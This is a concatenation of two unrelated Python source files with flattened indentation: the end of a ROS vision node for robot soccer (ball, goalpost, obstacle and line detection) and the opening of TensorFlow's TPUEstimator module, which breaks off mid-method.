threshold=config['obstacle_color_threshold'])
'''
# Check if the yolo ball/goalpost detector is activated and if the non tpu version is used
if config['neural_network_type'] in ['yolo_opencv', 'yolo_darknet']:
if ros_utils.config_param_change(self._config, config, ['yolo_darknet_model_path', 'neural_network_type']):
# Build absolute model path
yolo_darknet_model_path = os.path.join(self._package_path, 'models', config['yolo_darknet_model_path'])
# Check if it exists
if not os.path.exists(os.path.join(yolo_darknet_model_path, "yolo_weights.weights")):
rospy.logerr('The specified yolo darknet model file doesn\'t exist! Maybe its a fcnn model?', logger_name="vision_yolo")
else:
# Decide which yolo implementation should be used
if config['neural_network_type'] == 'yolo_opencv':
# Load OpenCV implementation (uses OpenCL)
self._yolo = yolo_handler.YoloHandlerOpenCV(config, yolo_darknet_model_path)
elif config['neural_network_type'] == 'yolo_darknet':
# Load Darknet implementation (uses CUDA)
self._yolo = yolo_handler.YoloHandlerDarknet(config, yolo_darknet_model_path)
rospy.loginfo(config['neural_network_type'] + " vision is running now", logger_name="vision_yolo")
# For other changes only modify the config
elif ros_utils.config_param_change(self._config, config, r'yolo_'):
self._yolo.set_config(config)
# Set both ball and goalpost detector
self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)
self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)
# Check if we use the yolo robot detection
if "robot" in self._yolo.get_classes():
self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)
# Check if tpu version of yolo ball/goalpost detector is used
if config['neural_network_type'] in ['yolo_ncs2']:
if ros_utils.config_param_change(self._config, config, ['neural_network_type', 'yolo_openvino_model_path']):
# Build absolute model path
yolo_openvino_model_path = os.path.join(self._package_path, 'models', config['yolo_openvino_model_path'])
# Check if it exists
if not os.path.exists(os.path.join(yolo_openvino_model_path, "yolo.bin")) \
or not os.path.exists(os.path.join(yolo_openvino_model_path, "yolo.xml")):
rospy.logerr('The specified yolo openvino model file doesn\'t exist! Maybe its a fcnn model?', logger_name="vision_yolo")
else:
self._yolo = yolo_handler.YoloHandlerNCS2(config, yolo_openvino_model_path)
rospy.loginfo(config['neural_network_type'] + " vision is running now", logger_name="vision_yolo")
# For other changes only modify the config
elif ros_utils.config_param_change(self._config, config, r'yolo_'):
self._yolo.set_config(config)
# Set both ball and goalpost detector
self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)
self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)
# Check if we use the yolo robot detection
if "robot" in self._yolo.get_classes():
self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)
# Set the other obstacle detectors
self._red_obstacle_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._red_color_detector,
threshold=config['obstacle_color_threshold'],
subtractors=[self._goalpost_detector])
self._blue_obstacle_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._blue_color_detector,
threshold=config['obstacle_color_threshold'],
subtractors=[self._red_obstacle_detector, self._goalpost_detector])
self._unknown_obstacle_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
threshold=config['obstacle_color_threshold'],
subtractors=[self._red_obstacle_detector, self._blue_obstacle_detector, self._goalpost_detector])
self._register_or_update_all_subscribers(config)
        # Define modules that should run their calculations (the modules must already exist, which is why this is located here)
self._conventional_modules = [
self._field_color_detector,
self._white_color_detector,
self._red_color_detector,
self._blue_color_detector,
self._unknown_obstacle_detector,
self._obstacle_detector,
self._line_detector,
]
# Publish Config-message (mainly for the dynamic color lookup table node)
ros_utils.publish_vision_config(config, self._pub_config)
# The old _config gets replaced with the new _config
self._config = config
def _register_or_update_all_publishers(self, config):
# type: (dict) -> None
"""
This method registers all publishers needed for the vision node.
        Always create a placeholder for each publisher in __init__.
:param dict config: new, incoming _config
:return: None
"""
self._pub_audio = ros_utils.create_or_update_publisher(self._config, config, self._pub_audio, 'ROS_audio_msg_topic', Audio, queue_size=10)
self._pub_balls = ros_utils.create_or_update_publisher(self._config, config, self._pub_balls, 'ROS_ball_msg_topic', BallInImageArray)
self._pub_lines = ros_utils.create_or_update_publisher(self._config, config, self._pub_lines, 'ROS_line_msg_topic', LineInformationInImage, queue_size=5)
self._pub_line_mask = ros_utils.create_or_update_publisher(self._config, config, self._pub_line_mask, 'ROS_line_mask_msg_topic', Image)
self._pub_obstacle = ros_utils.create_or_update_publisher(self._config, config, self._pub_obstacle, 'ROS_obstacle_msg_topic', ObstacleInImageArray, queue_size=3)
self._pub_goal_posts = ros_utils.create_or_update_publisher(self._config, config, self._pub_goal_posts, 'ROS_goal_posts_msg_topic', GoalPostInImageArray, queue_size=3)
#self._pub_ball_fcnn = ros_utils.create_or_update_publisher(self._config, config, self._pub_ball_fcnn, 'ROS_fcnn_img_msg_topic', RegionOfInterestWithImage)
self._pub_debug_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_debug_image, 'ROS_debug_image_msg_topic', Image)
self._pub_convex_field_boundary = ros_utils.create_or_update_publisher(self._config, config, self._pub_convex_field_boundary, 'ROS_field_boundary_msg_topic', PolygonStamped)
#self._pub_debug_fcnn_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_debug_fcnn_image, 'ROS_debug_fcnn_image_msg_topic', Image)
self._pub_white_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_white_mask_image, 'ROS_white_HSV_mask_image_msg_topic', Image)
self._pub_red_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_red_mask_image, 'ROS_red_HSV_mask_image_msg_topic', Image)
self._pub_blue_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_blue_mask_image, 'ROS_blue_HSV_mask_image_msg_topic', Image)
self._pub_field_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_field_mask_image, 'ROS_field_mask_image_msg_topic', Image)
self._pub_dynamic_color_lookup_table_field_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_dynamic_color_lookup_table_field_mask_image, 'ROS_dynamic_color_lookup_table_field_mask_image_msg_topic', Image)
def _register_or_update_all_subscribers(self, config):
# type: (dict) -> None
"""
This method registers all subscribers needed for the vision node.
:param dict config: new, incoming _config
:return: None
"""
self._sub_image = ros_utils.create_or_update_subscriber(self._config, config, self._sub_image, 'ROS_img_msg_topic', Image, callback=self._image_callback, queue_size=config['ROS_img_msg_queue_size'], buff_size=60000000) # https://github.com/ros/ros_comm/issues/536
if isinstance(self._field_color_detector, color.DynamicPixelListColorDetector):
self._sub_dynamic_color_lookup_table_msg_topic = ros_utils.create_or_update_subscriber(self._config, config, self._sub_dynamic_color_lookup_table_msg_topic, 'ROS_dynamic_color_lookup_table_msg_topic', ColorLookupTable, callback=self._field_color_detector.color_lookup_table_callback, queue_size=1, buff_size=2 ** 20)
def _image_callback(self, image_msg):
# type: (Image) -> None
"""
This method is called by the Image-message subscriber.
        Old Image-messages are dropped.
        Sometimes the queue gets too large, even when the size is limited to 1.
        That's why we drop old images manually.
        """
        # Drops old images and cleans up the queue.
        # Still accepts very old images, which are most likely from ROS bags.
image_age = rospy.get_rostime() - image_msg.header.stamp
if 1.0 < image_age.to_sec() < 1000.0:
rospy.logwarn(f"Vision: Dropped incoming Image-message, because its too old! ({image_age.to_sec()} sec)",
logger_name="vision")
return
if self._transfer_image_msg_mutex.locked():
return
with self._transfer_image_msg_mutex:
# Transfer the image to the main thread
self._transfer_image_msg = image_msg
def _handle_image(self, image_msg):
"""
Runs the vision pipeline
:param image_msg: Image message provided by ROS
"""
# converting the ROS image message to CV2-image
image = self._cv_bridge.imgmsg_to_cv2(image_msg, 'bgr8')
# Skip if image is None
if image is None:
rospy.logdebug("Image content is None :(", logger_name="vision")
return
        # Check if it's the first image callback
if self._first_image_callback:
# Check if a cap may be on the camera
self._handle_forgotten_camera_cap(image)
# Instances that should be notified with the new image
        internal_image_subscribers = [
self._field_color_detector,
self._white_color_detector,
self._red_color_detector,
self._blue_color_detector,
self._unknown_obstacle_detector,
self._field_boundary_detector,
self._obstacle_detector,
self._red_obstacle_detector,
self._blue_obstacle_detector,
self._goalpost_detector,
self._line_detector,
self._ball_detector,
self._debug_image_creator,
]
# Distribute the image to the detectors
# Iterate over subscribers
for vision_object in internal_image_subscribers:
# Send image
vision_object.set_image(image)
# Check if the vision should run the conventional and neural net part parallel
if self._config['vision_parallelize']:
# Create and start threads for conventional calculation and neural net
#fcnn_thread = Thread(target=self._ball_detector.compute)
            # Pass the bound method itself as the thread target; calling it here would run it synchronously
            conventional_thread = Thread(target=self._conventional_precalculation)
conventional_thread.start()
#fcnn_thread.start()
# Wait for both threads
conventional_thread.join()
#fcnn_thread.join()
else:
# Calc conventional calculation and neural net
self._ball_detector.compute()
self._conventional_precalculation()
########
# Ball #
########
        # Get a number of top balls under the field boundary, which have a high enough rating
all_balls = self._ball_detector.get_top_candidates(count=self._max_balls)
balls_under_field_boundary = \
self._field_boundary_detector.candidates_under_convex_field_boundary(
all_balls,
self._ball_candidate_y_offset)
top_balls = candidate.Candidate.rating_threshold(
balls_under_field_boundary,
self._ball_candidate_threshold)
# check whether there are ball candidates
if top_balls:
            # Convert ball candidate list to ball message list
list_of_balls = map(ros_utils.build_ball_msg, top_balls)
# Create balls msg with the list of balls
balls_msg = ros_utils.build_balls_msg(image_msg.header, list_of_balls)
# Publish balls
self._pub_balls.publish(balls_msg)
# Debug draw all ball candidates
self._debug_image_creator.draw_ball_candidates(
all_balls,
(0, 0, 255))
# Debug draw possible ball candidates under the field boundary
self._debug_image_creator.draw_ball_candidates(
balls_under_field_boundary,
(0, 255, 255))
# Debug draw top ball candidate
self._debug_image_creator.draw_ball_candidates(
top_balls,
(0, 255, 0),
thickness=2)
#############
# Obstacles #
#############
# Init list for obstacle msgs
list_of_obstacle_msgs = []
# Add red obstacles
list_of_obstacle_msgs.extend(ros_utils.build_obstacle_msgs(ObstacleInImage.ROBOT_MAGENTA,
self._red_obstacle_detector.get_candidates()))
# Add blue obstacles
list_of_obstacle_msgs.extend(ros_utils.build_obstacle_msgs(ObstacleInImage.ROBOT_CYAN,
self._blue_obstacle_detector.get_candidates()))
# Add UFO's (Undefined Found Obstacles)
list_of_obstacle_msgs.extend(ros_utils.build_obstacle_msgs(ObstacleInImage.UNDEFINED,
self._unknown_obstacle_detector.get_candidates()))
# Build obstacles msgs containing all obstacles
obstacles_msg = ros_utils.build_obstacle_array_msg(image_msg.header, list_of_obstacle_msgs)
# Publish obstacles
self._pub_obstacle.publish(obstacles_msg)
# Debug draw unknown obstacles
self._debug_image_creator.draw_obstacle_candidates(
self._unknown_obstacle_detector.get_candidates(),
(0, 0, 0),
thickness=3)
# Debug draw red obstacles
self._debug_image_creator.draw_obstacle_candidates(
self._red_obstacle_detector.get_candidates(),
(0, 0, 255),
thickness=3)
# Debug draw blue obstacles
self._debug_image_creator.draw_obstacle_candidates(
self._blue_obstacle_detector.get_candidates(),
(255, 0, 0),
thickness=3)
########
# Goal #
########
# Get all goalposts under field boundary
goal_posts = self._field_boundary_detector.candidates_under_convex_field_boundary(
self._goalpost_detector.get_candidates(),
self._goal_post_field_boundary_y_offset)
# Get goalpost msgs and add them to the detected goal posts list
goal_post_msgs = ros_utils.build_goal_post_msgs(goal_posts)
# Create goalposts msg
goal_posts_msg = ros_utils.build_goal_post_array_msg(image_msg.header, goal_post_msgs)
# Check if there is a goal
if goal_posts_msg:
# If we have a goal, lets publish it
self._pub_goal_posts.publish(goal_posts_msg)
# Debug draw all goal posts
self._debug_image_creator.draw_obstacle_candidates(
self._goalpost_detector.get_candidates(),
(180, 180, 180),
thickness=3)
# Debug draw goal posts which start in the field
self._debug_image_creator.draw_obstacle_candidates(
goal_posts,
(255, 255, 255),
thickness=3)
#########
# Lines #
#########
if self._use_line_points:
# Build a LineSegmentInImage message for each linepoint
line_points = self._line_detector.get_linepoints()
# Create line segments
line_segments = ros_utils.convert_line_points_to_line_segment_msgs(line_points)
# Create line msg
line_msg = ros_utils.build_line_information_in_image_msg(image_msg.header, line_segments)
# Publish lines
self._pub_lines.publish(line_msg)
# Draw debug line points
self._debug_image_creator.draw_points(
line_points,
(0, 0, 255))
if self._use_line_mask:
# Define detections (Balls, Goal Posts) that are excluded from the line mask
excluded_objects = top_balls + goal_posts
# Get line pixel mask
line_mask = self._line_detector.get_line_mask_without_other_objects(excluded_objects)
# Create line mask message
line_mask_message = ros_utils.build_image_msg(image_msg.header, line_mask, '8UC1')
# Publish line mask
self._pub_line_mask.publish(line_mask_message)
# Draw debug line mask
self._debug_image_creator.draw_mask(
line_mask,
color=(255, 0, 0),
opacity=0.8)
##################
# Field boundary #
##################
# Get field boundary msg
convex_field_boundary = self._field_boundary_detector.get_convex_field_boundary_points()
# Build ros message
convex_field_boundary_msg = ros_utils.build_field_boundary_polygon_msg(image_msg.header, convex_field_boundary)
# Publish field boundary
self._pub_convex_field_boundary.publish(convex_field_boundary_msg)
# Debug draw convex field boundary
self._debug_image_creator.draw_field_boundary(
convex_field_boundary,
(0, 255, 255))
# Debug draw field boundary
self._debug_image_creator.draw_field_boundary(
self._field_boundary_detector.get_field_boundary_points(),
(0, 0, 255))
#########
# Debug #
#########
'''
if self._config['neural_network_type'] == 'fcnn':
# Publish fcnn output for the region of interest under the field boundary (for the world model)
if self._ball_fcnn_publish_output:
roi_msg = ros_utils.build_fcnn_region_of_interest(
self._ball_detector.get_fcnn_output(),
self._field_boundary_detector,
image_msg.header,
self._config['ball_fcnn_publish_field_boundary_offset'])
self._pub_ball_fcnn.publish(roi_msg)
# Publish whole fcnn output for debug purposes
if self._publish_fcnn_debug_image:
self._pub_debug_fcnn_image.publish(self._ball_detector.get_debug_image())
'''
# Check if HSV mask images should be published
if self._publish_HSV_mask_image:
# Mask images
white_mask = self._white_color_detector.get_mask_image()
red_mask = self._red_color_detector.get_mask_image()
blue_mask = self._blue_color_detector.get_mask_image()
# Publish mask images
self._pub_white_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, white_mask, '8UC1'))
self._pub_red_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, red_mask, '8UC1'))
self._pub_blue_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, blue_mask, '8UC1'))
# Check if the field mask image should be published
if self._publish_field_mask_image:
if isinstance(self._field_color_detector, color.DynamicPixelListColorDetector):
# Mask image
dyn_field_mask = self._field_color_detector.get_mask_image()
static_field_mask = self._field_color_detector.get_static_mask_image()
# Publish mask image
self._pub_dynamic_color_lookup_table_field_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, dyn_field_mask, '8UC1'))
self._pub_field_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, static_field_mask, '8UC1'))
else:
# Mask image
field_mask = self._field_color_detector.get_mask_image()
# Publish mask image
self._pub_field_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, field_mask, '8UC1'))
# Check if we should draw debug image
if self._debug_image_creator.active:
# publish debug image
self._pub_debug_image.publish(
ros_utils.build_image_msg(
image_msg.header,
self._debug_image_creator.get_image(),
'bgr8'))
def _conventional_precalculation(self):
"""
Starts the conventional calculations
"""
# Run all modules
for module in self._conventional_modules:
module.compute()
def _handle_forgotten_camera_cap(self, image):
# type: (np.array) -> None
"""
Detects a forgotten cap on the camera and notifies this via speech
:param image: Image
"""
# Calculate the mean brightness of the image to detect a forgotten camera cap
mean = cv2.mean(image)
# Notify if a camera cap is detected
if sum(mean) < self._blind_threshold:
rospy.logerr("Image is too dark! Camera cap not removed?", logger_name="vision")
ros_utils.speak("Hey! Remove my camera cap!", self._pub_audio)
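# Illustrative sketch (not part of the original node): the cap check above in
# isolation, using the same cv2.mean() brightness heuristic (cv2 is already
# imported by this module, as it is used above). The helper name and default
# threshold below are made up; the node reads its own threshold from config.
def _example_is_camera_capped(frame, blind_threshold=30):
    """Hypothetical helper: returns True if the frame is suspiciously dark."""
    # cv2.mean returns a 4-tuple of per-channel means; an (almost) black frame
    # sums to (nearly) zero, which falls below any positive threshold.
    return sum(cv2.mean(frame)) < blind_threshold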
if __name__ == '__main__':
Vision()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations to the final step count
specified by users. For example, if the user sets iterations_per_loop to 4
in TPUConfig and steps to 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following values before each TPU training loop:
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
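# Illustrative sketch (not part of the original module): the adaptation the
# docstring above describes, computed in plain Python. With steps=10 and
# iterations_per_loop=4 the schedule is [4, 4, 2], so the global step reaches
# exactly 10 after the third TPU execution. The helper name is hypothetical.
def _example_iterations_per_loop_schedule(total_steps, iterations_per_loop):
  """Returns the per-execution loop counts used to consume `total_steps`."""
  schedule = []
  remaining = total_steps
  while remaining > 0:
    # Each TPU execution runs at most `iterations_per_loop` iterations, but
    # never more than the steps that are still left.
    schedule.append(min(iterations_per_loop, remaining))
    remaining -= schedule[-1]
  return schedule  # _example_iterations_per_loop_schedule(10, 4) == [4, 4, 2]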
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# The Estimator evaluation loop increases the eval step by 1 by default, so we
# add the remaining (iterations_per_loop - 1) here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
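# Worked example (illustration only): with iterations_per_loop=4 the op above
# adds 3 to the eval step; the Estimator evaluation loop itself adds the
# remaining 1, so the eval step advances by 4 per `Session.run`.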
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
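# Illustrative usage (not part of the original module): rate-limit a progress
# message to at most once per minute inside a tight loop. Names are made up.
#
#   progress_logger = PeriodicLogger(seconds=60)
#   for step in range(num_steps):
#     progress_logger.log('processed %d steps', step)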
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call`
currently works for train() and evaluate(). The Tensors returned by the
function are executed on the CPU on every step, so there is communication
overhead when sending tensors from TPU to CPU. To reduce the overhead, try
reducing the size of the tensors. The `tensors` are concatenated along their
major (batch) dimension, and so must be >= rank 1. The `host_call` is useful
for writing summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
